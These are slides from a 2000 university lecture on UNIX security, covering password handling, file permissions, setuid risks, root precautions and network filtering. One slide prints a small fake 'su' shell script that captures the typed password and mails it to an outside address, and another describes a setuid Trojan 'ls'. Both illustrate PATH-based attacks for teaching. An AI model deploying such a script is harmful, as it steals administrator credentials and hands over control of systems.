Transcript UNIX Tools G22.2245

UNIX Tools
G22.2245-001, Fall 2000
Danielle S. Lahmani
email: [email protected]
Lecture 11
2000 Copyrights, Danielle S.
Lahmani
Security Definition
• “Making sure that the data stored on a
computer or computer networks, is
accessible only to people who are
authorized to see it,
• and that the data is safeguarded against
corruption or loss. “
• by K. Christian
2000 Copyrights, Danielle S.
Lahmani
Two major goals of security
• Protect data against loss (can be achieved
through frequent backups)
• secure the system against intrusion and
unauthorized use.
2000 Copyrights, Danielle S.
Lahmani
COMPONENTS OF SECURITY
• Authentication: proving that you are who you
say you are
• Access Rights: giving you the information for
which you have clearance
• Integrity: Protecting information from
unauthorized exposure
• Prevention of subversion: guard against
replay attacks,Trojan horse attacks and
Covert Channel attacks.
2000 Copyrights, Danielle S.
Lahmani
Security Definitions
• A Trojan Horse is any program that performs
some obvious functions and compromises a
user's security at the same time.
• A covert channel is some way of getting
information other than direct reads and
writes, examples are the ps command or the
viewing of /tmp.
2000 Copyrights, Danielle S.
Lahmani
Protection against
Intruders
•
•
•
•
•
Password Security
File and file system security
Incorrect search PATH
denial of service
networking security
2000 Copyrights, Danielle S.
Lahmani
Passwords and Accounts
• Every person should have his or her
individual account.
• Remove the accounts of people who no
longer need it or have left the company
• provide user with initial password and
instruct user to change it immediately
2000 Copyrights, Danielle S.
Lahmani
How passwords Work
• Passwords are encrypted:
– login program uses the “salt” to encrypt typed
password and then check if the resulting string
matches the password stored in /etc/passwd
2000 Copyrights, Danielle S.
Lahmani
Password Security
• People often use password that can be
guessed easily.
• Several measures to protect login password:
– Most UNIX systems split /etc/passwd file into two
files:
The file /etc/passwd no longer contains the
encrypted user password
/etc/shadow contains the encrypted password
that can only be read by root, to avoid subversion,
making it less vulnerable to password cracking.
2000 Copyrights, Danielle S.
Lahmani
Security Measures for password security
• Passwords should be changed periodically
• Don't use same password on multiple
machines
• Don't use a previous password. If it was
stolen before, the system can be
compromised.
• Educate users about bad passwords and
good passwords.
• Use password filtering
• Enforce password aging.
2000 Copyrights, Danielle S.
Lahmani
Files and file system security:
– A file can be writer-locked, but if the
directory is writable, an intruder can erase
your file and write a new one.
– File permissions modes are discretionary:
the owner of the file can change them
when it wants.
– Don't make you files or directories writable
by others
Make the directory containing the file and
its subdirectories write protected
2000 Copyrights, Danielle S.
Lahmani
File and File system Security
– Use your own temporary directory
under $HOME/tmp, /tmp and
/usr/tmp are writable by others.
Although your temporary file under
these directories is writable only by
you, a user can replace a temporary
file in /tmp or /usr/tmp, which has the
effect of changing your files.
2000 Copyrights, Danielle S.
Lahmani
set uid/set gid programs
• This is a feature whereby a program
during its invocation acquires privileges
of either a superuser or an author (the
owner of the file) for the duration of the
execution.
2000 Copyrights, Danielle S.
Lahmani
setuid/setgid subversion
• You can create a version of ls in a user's
directory that preceeds /bin in his path. This
version has setuid bit on.
The first thing it does is to create a new file
with setuid bit on.
Then it erases itself with some indication that
a line has been disconnected.
If you executed the file, you would have all
the owner's privileges
2000 Copyrights, Danielle S.
Lahmani
Scripts Precautions
• do not write SUI/SGID shell scripts.
• Scripts should always have full pathnames
2000 Copyrights, Danielle S.
Lahmani
Superuser Precaution
• Discourage or disable direct login as root
• use /bin/su to gain root privileges:
• /bin/su attempts are logged with the name of
the user who issued the su command
2000 Copyrights, Danielle S.
Lahmani
su: subversion
– Have the following script su and place it in
a directory that administrators can search
before the system's directories( will only
work if path is set to search current dir
first):
• stty -echo
echo -n Password:"
read X
echo ""
stty echo
echo $X | mail outside!creep &
sleep 1
echo Sorry.
2000 Copyrights, Danielle S.
rm su
Lahmani
Security recommendations
•
•
•
•
•
Root Accounts:
Login directly as root only at the console
Only root should have uid 0
Root should never have a "." in its path
Only use full pathnames when issuing a
command
• Do not create root temp files if possible in
publicly owned directories.
2000 Copyrights, Danielle S.
Lahmani
UNIX NETWORK SECURITY
• BERKELY SERVICES
• The R* commands allow host equivalency which
is based on the idea that if the user has been
authenticated on one trusted computer (host), then
there is no reason to reauthenticate the user on a
second computer.
• Host equivalence is extended through use of
.rhost, .netrc and /etc/hosts.equiv files.
2000 Copyrights, Danielle S.
Lahmani
Berkeley r* commands
• An ordinary user can create a file .rhost in her
$HOME direcotry and extend host equivalence to
herself when accessing the computer without any
intervention from a system administrator.
• In Sun systems, the r* commands have been
modified to run on top of ssh (secure shell) which
requires a password and ignores .rhosts
equivalence.
2000 Copyrights, Danielle S.
Lahmani
Security Standards and
technology
• S-HTTP: Secure HTTP is an extension to the
HTTP protocol to provide authentication and
encryption facilities at the setup of a session.
• Client and Server negotiate which encryption
mechanism will be used to secure the
messages.
• (SSL) Secure Socket Layer provides server
authentication, data encryption and message
integrity at the transport layer.
• Use of SSL and S-HTTP is not mutually
exclusive.
2000 Copyrights, Danielle S.
Lahmani
Security Standards (cont’)
• Secure IP (IPV6) is a specification for
extensions to the IP protocol that includes
additional security functions: an
authentication header and the encapsulation
security payload (ESP) protocol.
• Authentication header holds computed
authentication information based on the
message.
ESP protocol provides the ability to encrypt
some or all of the messages.
2000 Copyrights, Danielle S.
Lahmani
RECOMMENDATIONS FOR
NETWORK SECURITY
• Source:
http://www.unixtools.com/se
curecheck.html
2000 Copyrights, Danielle S.
Lahmani
Network Security: Filtering
• Do not enable services your are not
using (/etc/inetd.conf)
 Create access control lists
/var/adm/inted.sec to say what hosts
can connect
 Filter out unnecessary services at
router, only allow services you need.
 If your are on the Internet, build a
firewall.
2000 Copyrights, Danielle S.
Lahmani
FTP SECURITY
 Make sure you have /ftp/users will all
system accounts (uucp, bin, root)
 Minimal permissions/ minimal accounts
 Always use FTP logging and look at
logs
• Make directories unwriteable
2000 Copyrights, Danielle S.
Lahmani
PREVENT SPOOFING
• Router mode:
 Turn off source routing
 Apply a filter that guarantees that packets
coming from the outside network do not have
a source IP address that matches the inside
network.
 Qualified hostnames only in system files
(NFS, hosts.equiv…)
 No host.equiv or .rhosts if possible.
2000 Copyrights, Danielle S.
Lahmani